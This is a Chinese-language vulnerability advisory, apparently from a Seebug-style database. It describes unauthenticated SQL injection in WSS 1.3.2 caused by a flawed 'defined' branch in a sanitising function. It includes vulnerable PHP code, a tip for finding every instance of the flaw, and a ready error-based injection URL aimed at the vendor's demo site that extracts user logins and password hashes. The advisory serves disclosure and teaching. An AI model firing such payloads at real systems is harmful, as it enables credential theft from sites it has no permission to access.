|WSS最新版多处SQL注入直接获取数据三（官方demo演示及快速定位漏洞技巧）

WSS最新版多处SQL注入直接获取数据三（官方demo演示及快速定位漏洞技巧）

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述： WSS最新版多处SQL注入直接获取数据三，官方demo演示，这里存在多处，对同一问题进行总结 ### 详细说明： WSS最新版1.3.2，这里存在多处，并对此同一问题进行总结，以及快速查找同一问题全部漏洞 ``` 这里的漏洞没有任何权限限制，任何用户都能进行注入 ``` 漏洞分析： [WooYun: WSS最新版某处SQL注入直接获取数据二（两处）](http://www.wooyun.org/bugs/wooyun-2014-084139) WSS最新版某处SQL注入直接获取数据二（两处）这个漏洞之前已经降到了漏洞的过程因为全局过滤函数设计缺陷导致sql注入 ``` if (!function_exists("GetSQLValueString")) { function GetSQLValueString($theValue, $theType, $theDefinedValue = "", $theNotDefinedValue = "") { if (PHP_VERSION < 6) { $theValue = get_magic_quotes_gpc() ? stripslashes($theValue) : $theValue; } $theValue = function_exists("mysql_real_escape_string") ? mysql_real_escape_string($theValue) : mysql_escape_string($theValue); switch ($theType) { case "text": $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL"; break; case "long": case "int": $theValue = ($theValue != "") ? intval($theValue) : "NULL"; break; case "double": $theValue = ($theValue != "") ? doubleval($theValue) : "NULL"; break; case "date": $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL"; break; case "defined": $theValue = ($theValue != "") ? $theDefinedValue : $theNotDefinedValue; break; } return $theValue; } } ``` 看这里 ``` case "defined": $theValue = ($theValue != "") ? $theDefinedValue : $theNotDefinedValue; ``` 如果进到这里的话，就等于没有进行任何处理，然后返回了相应数据恰恰在程序里面很大地方都使用了这里的defined值，导致过滤无效漏洞定位：我们全局搜索： ``` "defined", ``` 得到6处存在漏洞的地方： [<img src="https://images.seebug.org/upload/201411/211728428813a4f7a754ce4009baa01742f3ed42.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/211728428813a4f7a754ce4009baa01742f3ed42.png) default_user.php上一个漏洞已经详细分析过了这里我们看看control_project.php和control_task.php 以control_task.php为例： ``` ...... $sortlist = "csa_last_update"; if (isset($_GET['sort'])) { $sortlist = $_GET['sort']; } $orderlist = "DESC"; if (isset($_GET['order'])) { $orderlist= $_GET['order']; } ...... $query_Recordset1 = sprintf("SELECT *, tk_project.project_name as project_name_prt, tk_user1.tk_display_name as tk_display_name1, tk_user2.tk_display_name as tk_display_name2 FROM tk_task inner join tk_task_tpye on tk_task.csa_type=tk_task_tpye.id inner join tk_project on tk_task.csa_project=tk_project.id inner join tk_user as tk_user1 on tk_task.csa_to_user=tk_user1.uid inner join tk_user as tk_user2 on tk_task.csa_from_user=tk_user2.uid inner join tk_status on tk_task.csa_remark2=tk_status.id $where (tk_task.csa_plan_st <=%s AND tk_task.csa_plan_et >=%s OR tk_task.csa_plan_st <=%s AND tk_task.csa_plan_et >=%s OR tk_task.csa_plan_st >=%s AND tk_task.csa_plan_et <=%s) ORDER BY %s %s", GetSQLValueString($startday , "text"), GetSQLValueString($startday , "text"), GetSQLValueString($endday , "text"), GetSQLValueString($endday , "text"), GetSQLValueString($startday , "text"), GetSQLValueString($endday , "text"), GetSQLValueString($sortlist, "defined", $sortlist, "NULL"), GetSQLValueString($orderlist, "defined", $orderlist, "NULL") ); $query_limit_Recordset1 = sprintf("%s LIMIT %d, %d", $query_Recordset1, $startRow_Recordset1, $maxRows_Recordset1); $Recordset1 = mysql_query($query_limit_Recordset1, $tankdb) or die(mysql_error()); $row_Recordset1 = mysql_fetch_assoc($Recordset1); ``` 漏洞原理跟上一个漏洞一致都是sort和order参数进入GetSQLValueString函数后，使用了defined类型，导致过滤失效这里直接访问control_project.php和control_task.php是不行的，会报错且这里存在绝对路径泄露： [<img src="https://images.seebug.org/upload/201411/21173055ebdd176997f288d1f159401fe1e34a38.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/21173055ebdd176997f288d1f159401fe1e34a38.png) 那么肯定是在其他地方调用了我们继续全局搜索： ``` control_project ``` 在/project.php调用： ``` <div class="pagemargin"> <?php require('control_project.php'); ?> </div> ``` 继续搜索 ``` control_task ``` 在/index.php调用： ``` <div class="pagemargin"> <?php require('control_task.php'); ?> </div> ``` 因为在index.php和project.php页面，且control_project.php和control_task.php没有权限限制，全部用户都有权限访问下面我们在官方demo测试 ### 漏洞证明：官方demo是最新正式版1.3.2 ``` http://wssys.sinaapp.com/project.php?sort=uid%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(select%20concat(0x23,tk_user_login,0x23,tk_user_pass)%20from%20tk_user%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%23&order=222222%27 ``` [<img src="https://images.seebug.org/upload/201411/2117375001f9a4da3b66f6d6bd51cc978ec39495.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/2117375001f9a4da3b66f6d6bd51cc978ec39495.png) ``` http://wssys.sinaapp.com/project.php?sort=uid%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(select%20concat(0x23,tk_user_login,0x23,tk_user_pass)%20from%20tk_user%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%23&order=222222%27 ``` [<img src="https://images.seebug.org/upload/201411/21173803ca48996b92e2d053cf31434fed43a910.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/21173803ca48996b92e2d053cf31434fed43a910.png)

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™